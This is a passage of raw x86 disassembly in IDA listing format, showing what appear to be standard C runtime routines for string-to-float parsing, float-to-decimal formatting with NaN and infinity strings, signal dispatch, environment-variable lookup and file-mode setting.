loc_41F7A5: ; CODE XREF: sub_41F5F7+19F�j
; sub_41F5F7+1A4�j ...
cmp ds:dword_42F56C, edx
jle short loc_41F7BE
movzx eax, bl
push esi
push eax
call sub_418762
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F7CC
; ---------------------------------------------------------------------------
loc_41F7BE: ; CODE XREF: sub_41F5F7+1B4�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F7CC: ; CODE XREF: sub_41F5F7+1C5�j
test eax, eax
jz short loc_41F7EC
cmp [ebp+var_4], 19h
jnb short loc_41F7E7
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_41F7E7: ; CODE XREF: sub_41F5F7+1DD�j
mov bl, [edi]
inc edi
jmp short loc_41F7A5
; ---------------------------------------------------------------------------
loc_41F7EC: ; CODE XREF: sub_41F5F7+18C�j
; sub_41F5F7+1D7�j
cmp bl, 2Bh
jz loc_41F6FF
cmp bl, 2Dh
jz loc_41F6FF
jmp loc_41F6D8
; ---------------------------------------------------------------------------
loc_41F803: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp ds:dword_42F56C, edx ; jumptable 0041F65A case 5
mov [ebp+var_24], edx
jle short loc_41F81F
movzx eax, bl
push esi
push eax
call sub_418762
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F82D
; ---------------------------------------------------------------------------
loc_41F81F: ; CODE XREF: sub_41F5F7+215�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F82D: ; CODE XREF: sub_41F5F7+226�j
test eax, eax
jz loc_41F8DF
mov eax, esi
jmp short loc_41F890
; ---------------------------------------------------------------------------
loc_41F839: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
lea ecx, [edi-2] ; jumptable 0041F65A case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_41F849
cmp bl, 39h
jle short loc_41F88D
loc_41F849: ; CODE XREF: sub_41F5F7+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F8C5
dec eax
dec eax
jz short loc_41F8B9
sub eax, 3
jnz loc_41F96D
loc_41F85E: ; CODE XREF: sub_41F5F7+2A4�j
push 8
jmp short loc_41F8C7
; ---------------------------------------------------------------------------
loc_41F862: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
mov [ebp+var_20], edx ; jumptable 0041F65A case 8
loc_41F865: ; CODE XREF: sub_41F5F7+276�j
cmp bl, 30h
jnz short loc_41F86F
mov bl, [edi]
inc edi
jmp short loc_41F865
; ---------------------------------------------------------------------------
loc_41F86F: ; CODE XREF: sub_41F5F7+271�j
cmp bl, 31h
jl loc_41F96A
cmp bl, 39h
jg loc_41F96A
jmp short loc_41F88D
; ---------------------------------------------------------------------------
loc_41F883: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp bl, 31h ; jumptable 0041F65A case 7
jl short loc_41F896
cmp bl, 39h
jg short loc_41F896
loc_41F88D: ; CODE XREF: sub_41F5F7+250�j
; sub_41F5F7+28A�j
push 9
loc_41F88F: ; CODE XREF: sub_41F5F7+76�j
pop eax
loc_41F890: ; CODE XREF: sub_41F5F7+240�j
dec edi
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F896: ; CODE XREF: sub_41F5F7+28F�j
; sub_41F5F7+294�j
cmp bl, 30h
jnz short loc_41F8DF
jmp short loc_41F85E
; ---------------------------------------------------------------------------
loc_41F89D: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp [ebp+arg_18], 0 ; jumptable 0041F65A case 11
jz short loc_41F8CD
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_41F8C5
dec eax
dec eax
jnz loc_41F96D
loc_41F8B9: ; CODE XREF: sub_41F5F7+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F8C5: ; CODE XREF: sub_41F5F7+258�j
; sub_41F5F7+2B8�j
push 7
loc_41F8C7: ; CODE XREF: sub_41F5F7+85�j
; sub_41F5F7+103�j ...
pop eax
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F8CD: ; CODE XREF: sub_41F5F7+2AA�j
push 0Ah
dec edi
pop eax
loc_41F8D1: ; CODE XREF: sub_41F5F7+5D�j
; sub_41F5F7+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041F65A case 10
jz loc_41F96F
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F8DF: ; CODE XREF: sub_41F5F7+12D�j
; sub_41F5F7+238�j ...
mov edi, [ebp+arg_8]
jmp loc_41F96F
; ---------------------------------------------------------------------------
loc_41F8E7: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
mov [ebp+var_20], 1 ; jumptable 0041F65A case 9
xor esi, esi
loc_41F8F0: ; CODE XREF: sub_41F5F7+339�j
cmp ds:dword_42F56C, 1
jle short loc_41F908
movzx eax, bl
push 4
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_41F917
; ---------------------------------------------------------------------------
loc_41F908: ; CODE XREF: sub_41F5F7+300�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F917: ; CODE XREF: sub_41F5F7+30F�j
test eax, eax
jz short loc_41F937
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41F932
mov bl, [edi]
inc edi
jmp short loc_41F8F0
; ---------------------------------------------------------------------------
loc_41F932: ; CODE XREF: sub_41F5F7+334�j
mov esi, 1451h
loc_41F937: ; CODE XREF: sub_41F5F7+322�j
mov [ebp+var_1C], esi
loc_41F93A: ; CODE XREF: sub_41F5F7+371�j
cmp ds:dword_42F56C, 1
jle short loc_41F952
movzx eax, bl
push 4
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_41F961
; ---------------------------------------------------------------------------
loc_41F952: ; CODE XREF: sub_41F5F7+34A�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F961: ; CODE XREF: sub_41F5F7+359�j
test eax, eax
jz short loc_41F96A
mov bl, [edi]
inc edi
jmp short loc_41F93A
; ---------------------------------------------------------------------------
loc_41F96A: ; CODE XREF: sub_41F5F7+99�j
; sub_41F5F7+E4�j ...
dec edi
jmp short loc_41F96F
; ---------------------------------------------------------------------------
loc_41F96D: ; CODE XREF: sub_41F5F7+261�j
; sub_41F5F7+2BC�j
mov edi, ecx
loc_41F96F: ; CODE XREF: sub_41F5F7+2DD�j
; sub_41F5F7+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_41FA57
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_41F99B
cmp [ebp+var_45], 5
jl short loc_41F98F
inc [ebp+var_45]
loc_41F98F: ; CODE XREF: sub_41F5F7+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_41F99E
; ---------------------------------------------------------------------------
loc_41F99B: ; CODE XREF: sub_41F5F7+38D�j
mov eax, [ebp+var_C]
loc_41F99E: ; CODE XREF: sub_41F5F7+3A2�j
cmp [ebp+var_4], 0
jbe loc_41FA4D
loc_41F9A8: ; CODE XREF: sub_41F5F7+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_41F9B6
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_41F9A8
; ---------------------------------------------------------------------------
loc_41F9B6: ; CODE XREF: sub_41F5F7+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_41F530
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_41F9D5
neg eax
loc_41F9D5: ; CODE XREF: sub_41F5F7+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_41F9E0
add eax, [ebp+arg_10]
loc_41F9E0: ; CODE XREF: sub_41F5F7+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_41F9E8
sub eax, [ebp+arg_14]
loc_41F9E8: ; CODE XREF: sub_41F5F7+3EC�j
cmp eax, 1450h
jle short loc_41FA1F
mov [ebp+var_2C], 1
loc_41F9F6: ; CODE XREF: sub_41F5F7+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_41FA02: ; CODE XREF: sub_41F5F7+454�j
; sub_41F5F7+45E�j
cmp [ebp+var_2C], 0
jz short loc_41FA68
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_41FA7D
; ---------------------------------------------------------------------------
loc_41FA1F: ; CODE XREF: sub_41F5F7+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_41FA2F
mov [ebp+var_30], 1
jmp short loc_41F9F6
; ---------------------------------------------------------------------------
loc_41FA2F: ; CODE XREF: sub_41F5F7+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_4201E0
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_41FA02
; ---------------------------------------------------------------------------
loc_41FA4D: ; CODE XREF: sub_41F5F7+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_41FA02
; ---------------------------------------------------------------------------
loc_41FA57: ; CODE XREF: sub_41F5F7+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_41FA7D
; ---------------------------------------------------------------------------
loc_41FA68: ; CODE XREF: sub_41F5F7+40F�j
cmp [ebp+var_30], 0
jz short loc_41FA7D
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_41FA7D: ; CODE XREF: sub_41F5F7+426�j
; sub_41F5F7+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_41F5F7 endp
; ---------------------------------------------------------------------------
off_41FA98 dd offset loc_41F661 ; DATA XREF: sub_41F5F7+63�r
dd offset loc_41F6B0 ; jump table for switch statement
dd offset loc_41F707
dd offset loc_41F731
dd offset loc_41F78C
dd offset loc_41F803
dd offset loc_41F839
dd offset loc_41F883
dd offset loc_41F862
dd offset loc_41F8E7
dd offset loc_41F8D1
dd offset loc_41F89D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FAC8 proc near ; CODE XREF: sub_41E86B+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_41FB2A
mov byte ptr [ebx+2], 2Dh
jmp short loc_41FB2E
; ---------------------------------------------------------------------------
loc_41FB2A: ; CODE XREF: sub_41FAC8+5A�j
mov byte ptr [ebx+2], 20h
loc_41FB2E: ; CODE XREF: sub_41FAC8+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_41FB54
test edi, edi
jnz short loc_41FB54
cmp [ebp+arg_0], edi
jnz short loc_41FB54
loc_41FB3F: ; CODE XREF: sub_41FAC8+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_41FD52
; ---------------------------------------------------------------------------
loc_41FB54: ; CODE XREF: sub_41FAC8+6C�j
; sub_41FAC8+70�j ...
cmp dx, si
jnz short loc_41FBD3
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_41FB6D
cmp [ebp+arg_0], 0
jz short loc_41FB7C
loc_41FB6D: ; CODE XREF: sub_41FAC8+9D�j
test edi, 40000000h
jnz short loc_41FB7C
push offset a1Snan ; "1#SNAN"
jmp short loc_41FBC2
; ---------------------------------------------------------------------------
loc_41FB7C: ; CODE XREF: sub_41FAC8+A3�j
; sub_41FAC8+AB�j
test cx, cx
jz short loc_41FB96
cmp edi, 0C0000000h
jnz short loc_41FB96
cmp [ebp+arg_0], 0
jnz short loc_41FBBD
push offset a1Ind ; "1#IND"
jmp short loc_41FBA5
; ---------------------------------------------------------------------------
loc_41FB96: ; CODE XREF: sub_41FAC8+B7�j
; sub_41FAC8+BF�j
cmp edi, eax
jnz short loc_41FBBD
cmp [ebp+arg_0], 0
jnz short loc_41FBBD
push offset a1Inf ; "1#INF"
loc_41FBA5: ; CODE XREF: sub_41FAC8+CC�j
lea eax, [ebx+4]
push eax
call sub_415B90
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_41FBB4: ; CODE XREF: sub_41FAC8+109�j
and [ebp+var_4], 0
jmp loc_41FD2B
; ---------------------------------------------------------------------------
loc_41FBBD: ; CODE XREF: sub_41FAC8+C5�j
; sub_41FAC8+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_41FBC2: ; CODE XREF: sub_41FAC8+B2�j
lea eax, [ebx+4]
push eax
call sub_415B90
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_41FBB4
; ---------------------------------------------------------------------------
loc_41FBD3: ; CODE XREF: sub_41FAC8+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_4201E0
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_41FC34
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_41FFC0
pop ecx
pop ecx
loc_41FC34: ; CODE XREF: sub_41FAC8+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_41FC4E
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41FC51
jmp loc_41FB3F
; ---------------------------------------------------------------------------
loc_41FC4E: ; CODE XREF: sub_41FAC8+173�j
mov edi, [ebp+arg_C]
loc_41FC51: ; CODE XREF: sub_41FAC8+17F�j
cmp edi, 15h
jle short loc_41FC59
push 15h
pop edi
loc_41FC59: ; CODE XREF: sub_41FAC8+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_41FC6F: ; CODE XREF: sub_41FAC8+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_41F4D5
dec [ebp+arg_14]
pop ecx
jnz short loc_41FC6F
test esi, esi
jge short loc_41FC99
neg esi
and esi, 0FFh
jle short loc_41FC99
loc_41FC8C: ; CODE XREF: sub_41FAC8+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_41F503
dec esi
pop ecx
jnz short loc_41FC8C
loc_41FC99: ; CODE XREF: sub_41FAC8+1B8�j
; sub_41FAC8+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_41FCF6
mov [ebp+arg_C], ecx
loc_41FCA9: ; CODE XREF: sub_41FAC8+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_41F4D5
lea eax, [ebp+var_10]
push eax
call sub_41F4D5
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41F477
lea eax, [ebp+var_10]
push eax
call sub_41F4D5
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
mov [ecx], al
jnz short loc_41FCA9
mov eax, [ebp+arg_14]
loc_41FCF6: ; CODE XREF: sub_41FAC8+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_41FD33
loc_41FD03: ; CODE XREF: sub_41FAC8+248�j
cmp eax, ecx
jb short loc_41FD16
cmp byte ptr [eax], 39h
jnz short loc_41FD12
mov byte ptr [eax], 30h
dec eax
jmp short loc_41FD03
; ---------------------------------------------------------------------------
loc_41FD12: ; CODE XREF: sub_41FAC8+242�j
cmp eax, ecx
jnb short loc_41FD1A
loc_41FD16: ; CODE XREF: sub_41FAC8+23D�j
inc eax
inc word ptr [ebx]
loc_41FD1A: ; CODE XREF: sub_41FAC8+24C�j
inc byte ptr [eax]
loc_41FD1C: ; CODE XREF: sub_41FAC8+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41FD2B: ; CODE XREF: sub_41FAC8+F0�j
mov eax, [ebp+var_4]
loc_41FD2E: ; CODE XREF: sub_41FAC8+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FD33: ; CODE XREF: sub_41FAC8+239�j
; sub_41FAC8+275�j
cmp eax, ecx
jb short loc_41FD43
cmp byte ptr [eax], 30h
jnz short loc_41FD3F
dec eax
jmp short loc_41FD33
; ---------------------------------------------------------------------------
loc_41FD3F: ; CODE XREF: sub_41FAC8+272�j
cmp eax, ecx
jnb short loc_41FD1C
loc_41FD43: ; CODE XREF: sub_41FAC8+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_41FD52: ; CODE XREF: sub_41FAC8+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_41FD2E
sub_41FAC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD5B proc near ; CODE XREF: sub_41B61C+342F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_41FDC2
dec eax
dec eax
jz short loc_41FDB3
sub eax, 4
jz short loc_41FDB3
sub eax, 3
jz short loc_41FDB3
sub eax, 4
jz short loc_41FDA6
sub eax, 6
jz short loc_41FD99
dec eax
jz short loc_41FD8C
or eax, 0FFFFFFFFh
jmp loc_41FE84
; ---------------------------------------------------------------------------
loc_41FD8C: ; CODE XREF: sub_41FD5B+27�j
mov esi, ds:dword_4C9364
mov eax, offset dword_4C9364
jmp short loc_41FDCD
; ---------------------------------------------------------------------------
loc_41FD99: ; CODE XREF: sub_41FD5B+24�j
mov esi, ds:dword_4C9360
mov eax, offset dword_4C9360
jmp short loc_41FDCD
; ---------------------------------------------------------------------------
loc_41FDA6: ; CODE XREF: sub_41FD5B+1F�j
mov esi, ds:dword_4C9368
mov eax, offset dword_4C9368
jmp short loc_41FDCD
; ---------------------------------------------------------------------------
loc_41FDB3: ; CODE XREF: sub_41FD5B+10�j
; sub_41FD5B+15�j ...
push edi
call sub_41FE88
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_41FDCD
; ---------------------------------------------------------------------------
loc_41FDC2: ; CODE XREF: sub_41FD5B+C�j
mov esi, ds:dword_4C935C
mov eax, offset dword_4C935C
loc_41FDCD: ; CODE XREF: sub_41FD5B+3C�j
; sub_41FD5B+49�j ...
cmp esi, 1
jnz short loc_41FDD9
xor eax, eax
jmp loc_41FE84
; ---------------------------------------------------------------------------
loc_41FDD9: ; CODE XREF: sub_41FD5B+75�j
test esi, esi
jnz short loc_41FDE4
push 3
call sub_417C16
loc_41FDE4: ; CODE XREF: sub_41FD5B+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_41FDF6
cmp edi, 0Bh
jz short loc_41FDF6
cmp edi, 4
jnz short loc_41FE1C
loc_41FDF6: ; CODE XREF: sub_41FD5B+8F�j
; sub_41FD5B+94�j
mov ebx, ds:dword_4C9138
and ds:dword_4C9138, 0
cmp edi, ecx
jnz short loc_41FE4B
mov edx, ds:dword_4319DC
mov ds:dword_4319DC, 8Ch
mov [ebp+arg_0], edx
jmp short loc_41FE1F
; ---------------------------------------------------------------------------
loc_41FE1C: ; CODE XREF: sub_41FD5B+99�j
mov ebx, [ebp+arg_0]
loc_41FE1F: ; CODE XREF: sub_41FD5B+BF�j
cmp edi, ecx
jnz short loc_41FE4B
mov eax, ds:dword_4319D0
mov ecx, ds:dword_4319D4
add ecx, eax
cmp eax, ecx
jge short loc_41FE52
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:431960h[edx*4]
loc_41FE40: ; CODE XREF: sub_41FD5B+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_41FE40
jmp short loc_41FE52
; ---------------------------------------------------------------------------
loc_41FE4B: ; CODE XREF: sub_41FD5B+AA�j
; sub_41FD5B+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_41FE60
loc_41FE52: ; CODE XREF: sub_41FD5B+D7�j
; sub_41FD5B+EE�j
push ds:dword_4319DC
push 8
call esi
pop ecx
pop ecx
jmp short loc_41FE6E
; ---------------------------------------------------------------------------
loc_41FE60: ; CODE XREF: sub_41FD5B+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_41FE6E
cmp edi, 4
jnz short loc_41FE81
loc_41FE6E: ; CODE XREF: sub_41FD5B+103�j
; sub_41FD5B+10C�j
cmp edi, 8
mov ds:dword_4C9138, ebx
jnz short loc_41FE81
mov eax, [ebp+arg_0]
mov ds:dword_4319DC, eax
loc_41FE81: ; CODE XREF: sub_41FD5B+111�j
; sub_41FD5B+11C�j
xor eax, eax
pop ebx
loc_41FE84: ; CODE XREF: sub_41FD5B+2C�j
; sub_41FD5B+79�j
pop edi
pop esi
pop ebp
retn
sub_41FD5B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41FE88 proc near ; CODE XREF: sub_41FD5B+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_4319D8
cmp ds:dword_43195C, edx
push esi
mov eax, offset dword_431958
jz short loc_41FEB6
lea esi, [ecx+ecx*2]
lea esi, ds:431958h[esi*4]
loc_41FEAA: ; CODE XREF: sub_41FE88+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41FEB6
cmp [eax+4], edx
jnz short loc_41FEAA
loc_41FEB6: ; CODE XREF: sub_41FE88+16�j
; sub_41FE88+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:431958h[ecx*4]
cmp eax, ecx
jnb short loc_41FECA
cmp [eax+4], edx
jz short locret_41FECC
loc_41FECA: ; CODE XREF: sub_41FE88+3B�j
xor eax, eax
locret_41FECC: ; CODE XREF: sub_41FE88+40�j
retn
sub_41FE88 endp
; =============== S U B R O U T I N E =======================================
sub_41FECD proc near ; CODE XREF: sub_41EBF2+23�p
arg_0 = dword ptr 4
cmp ds:dword_4CA710, 0
push ebx
push esi
mov esi, ds:dword_4C90AC
push edi
jz short loc_41FF44
test esi, esi
jnz short loc_41FEFE
cmp ds:dword_4C90B4, esi
jz short loc_41FF44
call sub_42029B
test eax, eax
jnz short loc_41FF44
mov esi, ds:dword_4C90AC
test esi, esi
jz short loc_41FF44
loc_41FEFE: ; CODE XREF: sub_41FECD+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_41FF44
push ebx
call sub_415C80
pop ecx
mov edi, eax
loc_41FF0F: ; CODE XREF: sub_41FECD+6D�j
mov eax, [esi]
test eax, eax
jz short loc_41FF44
push eax
call sub_415C80
cmp eax, edi
pop ecx
jbe short loc_41FF37
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_41FF37
push edi
push ebx
push eax
call sub_42025C
add esp, 0Ch
test eax, eax
jz short loc_41FF3C
loc_41FF37: ; CODE XREF: sub_41FECD+51�j
; sub_41FECD+59�j
add esi, 4
jmp short loc_41FF0F
; ---------------------------------------------------------------------------
loc_41FF3C: ; CODE XREF: sub_41FECD+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_41FF46
; ---------------------------------------------------------------------------
loc_41FF44: ; CODE XREF: sub_41FECD+10�j
; sub_41FECD+1C�j ...
xor eax, eax
loc_41FF46: ; CODE XREF: sub_41FECD+75�j
pop edi
pop esi
pop ebx
retn
sub_41FECD endp
; =============== S U B R O U T I N E =======================================
sub_41FF4A proc near ; CODE XREF: sub_41F310+8B�p
; sub_41F310+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4CA4C0
jnb short loc_41FFB1
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CA3C0[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_41FFB1
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41FF8A
and cl, 7Fh
jmp short loc_41FF97
; ---------------------------------------------------------------------------
loc_41FF8A: ; CODE XREF: sub_41FF4A+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41FFA5
or cl, 80h
loc_41FF97: ; CODE XREF: sub_41FF4A+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41FFA5: ; CODE XREF: sub_41FF4A+48�j
mov ds:dword_4C9084, 16h
jmp short loc_41FFBB
; ---------------------------------------------------------------------------
loc_41FFB1: ; CODE XREF: sub_41FF4A+B�j
; sub_41FF4A+27�j
mov ds:dword_4C9084, 9
loc_41FFBB: ; CODE XREF: sub_41FF4A+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_41FF4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FFC0 proc near ; CODE XREF: sub_41FAC8+165�p
; sub_4201E0+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_4201C0
cmp cx, 7FFFh
jnb loc_4201C0
cmp dx, 0BFFDh
ja loc_4201C0
cmp dx, 3FBFh
ja short loc_420029
xor eax, eax
jmp short loc_420063
; ---------------------------------------------------------------------------
loc_420029: ; CODE XREF: sub_41FFC0+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_42004B
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_42004B
xor eax, eax
cmp [esi+4], eax
jnz short loc_42004D
cmp [esi], eax
jnz short loc_42004D
jmp loc_4201BA
; ---------------------------------------------------------------------------
loc_42004B: ; CODE XREF: sub_41FFC0+71�j
; sub_41FFC0+79�j
xor eax, eax
loc_42004D: ; CODE XREF: sub_41FFC0+80�j
; sub_41FFC0+84�j
cmp cx, ax
jnz short loc_420070
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_420070
cmp [ebx+4], eax
jnz short loc_420070
cmp [ebx], eax
jnz short loc_420070
loc_420063: ; CODE XREF: sub_41FFC0+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_4201DB
; ---------------------------------------------------------------------------
loc_420070: ; CODE XREF: sub_41FFC0+90�j
